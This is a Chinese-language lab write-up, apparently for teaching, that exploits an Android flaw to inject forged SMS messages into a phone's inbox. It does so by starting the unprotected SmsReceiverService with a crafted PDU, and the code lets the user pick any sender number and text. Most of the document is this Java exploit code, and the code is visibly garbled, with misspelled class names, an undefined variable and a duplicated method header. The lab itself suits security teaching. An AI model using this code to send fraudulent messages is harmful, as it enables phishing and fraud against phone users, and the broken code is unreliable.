目的:
- 通过JAVA编程理解Android手机安全漏洞的基本原理
- 用JAVA编写伪造短信代码,向系统收件箱发送伪造短信
原理:
- 漏洞原理介绍
- 该系统漏洞能够使攻击者无需申请任何权限发送短信到用户收件箱。 出现该漏洞的原因是Android系统的com.android.mms.transaction。
- SmsReceiverService系统服务未判断启动服务的调用者,攻击者可以通过该应用发送伪装短信到用户收件箱。本漏洞实质上是一种能力的泄漏。
- 漏洞发送的短信并不经过GSM网络,所以即使手机没有插sim卡,也照样可以收到短信,这让大部分的短信防火墙完全失效。
过程:
打开eclipse,点击file-import,选择android目录下的existing android code into workspacedata:image/s3,"s3://crabby-images/20fe8/20fe8cb9ad4a203715a33dbf2c2a8a19b8edbe1d" alt="image-20211229100046569"
选择simpleedu28项目data:image/s3,"s3://crabby-images/22f1a/22f1a5911d31886726076607af0e66f94c44bb1a" alt="image-20211229100118574"
导入后的项目data:image/s3,"s3://crabby-images/7332a/7332ad62221bd94a6a86b6dcd3085eff1891c9da" alt="image-20211229100200697"
在工程目录res/layout的界面代码,这里可以通过控制代码,编辑相应的函数生成欺诈短信,点击activity_main.xml,可以看到界面布局的文件data:image/s3,"s3://crabby-images/3c61d/3c61db16066670b3d08e3b0b65e823217ca6d8c7" alt="image-20211229100257165"
在mainactivity中添加运行欺诈短信的代码,点开msgdemo2\src\com.example.msgdemol\mainactivity.java
data:image/s3,"s3://crabby-images/bb791/bb79104a51c5f280996d28a61a09cfddebb963f4" alt="image-20211229100406295"
在mainactivity的init()函数添加如下代码,为button设置监听事件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| sendBt.setOnClickListener(new OnClickListener(){ @Override public void onClick(View v){
String num=msgNumTv.getText().toString(); String con=msgConTv.getText().toString(); If(num.length()<1||con.length()<1) { Toast.makeText(MainActivity.this,”电话号码或者内容没有输入”,Toast.LENGTH_SHORT).show(); return;}
createFakeMsg(MainActivity.this,num,con);} });
|
在MainActivity的init()函数,跳转到init函数位置添加上一步的代码
createFakeMsg的具体代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49
|
Private static void createFakeMsg(Context context,String num,String con){ byte[] pdu=null; byte[] scBytes=PhoneNumberUtils.networkPortionToCalledPartyBCD(num); int lsmcs=scBytes.length; byte[] dateBytes=new byte[7]; Calendar calendar=new GregorianCalendar(); dateBytes[0]=reverseByte((byte)(calendar.get(Caledar.YEAR))); dateBytes[1]=reverseByte((byte)(calendar.get(Caledar.MONTH)+1)); dateBytes[2]=reverseByte((byte)(calendar.get(Caledar.DAY_OF_MONTH))); dateBytes[3]=reverseByte((byte)(calendar.get(Caledar.HOUR_OF_DAY))); dateBytes[4]=reverseByte((byte)(calendar.get(Caledar.MINUTE))); dateBytes[5]=reverseByte((byte)(calendar.get(Caledar.SECOND))); dateBytes[6]=reverseByte((byte)((calendar.get(Caledar.ZONE_OFFSET)+calendar.get(Calendar.DST_OFFSET))/(60*1000*15))); try{ ByteArrayOutputStream bo=new ByteArrayOutputStream(); bo.write(lsmcs); bo.write(scBytes); bo.write(0x04); bo.write((byte)num.length()); bo.write(senderBytes); bo.write(0x00); bo.write(0x00); bo.write(dateBytes); try{ String sReflectedClassName=”com.android.internal.telephony.GsmAlphabet”; Class cRefectedNFCExtras=Class.forName(sReflectedClassName); Method stringToGsm7BitPacketd=cReflectedNFCExtras.getMethod(“stringToGsm7BitPacketd”,new Clas[]{String.class}); stringToGsm7BitPacked.setAccessible(true); byte[] conbytes=(byte[]) stringToGsm7BitPacked.invoke(null,con); bo.write(conbytes); }catch(Exception e){e.printStackTrace();} pdu=bo.toByteArray();} catch(IOException e){e.printStackTrace();} Intent intent=newIntent(); Intent.setClassName(“com.android.mms.transaction.SmsReceiverService”); Intent.setAction(“android.provider.Telephony.SMS_RECEIVED”); Intent.putExtra(“pdus”,new Object[]{pdu}); Context.startService(intent);} Private static byte reverseByte(byte b){ private static byte reverseByte(byte b){ return (byte)((b&0xf0)>>4|(b&0x0f)<<4);}
|
在已经设计好的欺诈短信发送界面,有两部分内容:伪造号码与伪造内容。这里的伪造号码,这是发件人的号码,因为是发给自己,所以没有收件人号码,。至于内容可以随意填写内容,使短信更具欺诈性。
AVD中打开虚拟机Simpleedu28虚拟安卓data:image/s3,"s3://crabby-images/89aeb/89aebdd173857c1082e315b031fc5691fcb6b1ae" alt="image-20211229102354469"
右键MSGDEMO2,选择run as-android application按钮data:image/s3,"s3://crabby-images/95b4f/95b4f5cb7ac9666b92473c247f29e6dce43e33ec" alt="image-20211229102712162"
虚拟端返回运行后结果data:image/s3,"s3://crabby-images/2e9ae/2e9ae1e9a49b24f457e187f304852bcfc6b55ce4" alt="image-20211229102740838"
点击发送,手机接收欺诈短信
data:image/s3,"s3://crabby-images/21743/217435977ccdfe5862343c36570eb238a14367ea" alt="image-20211229102848974"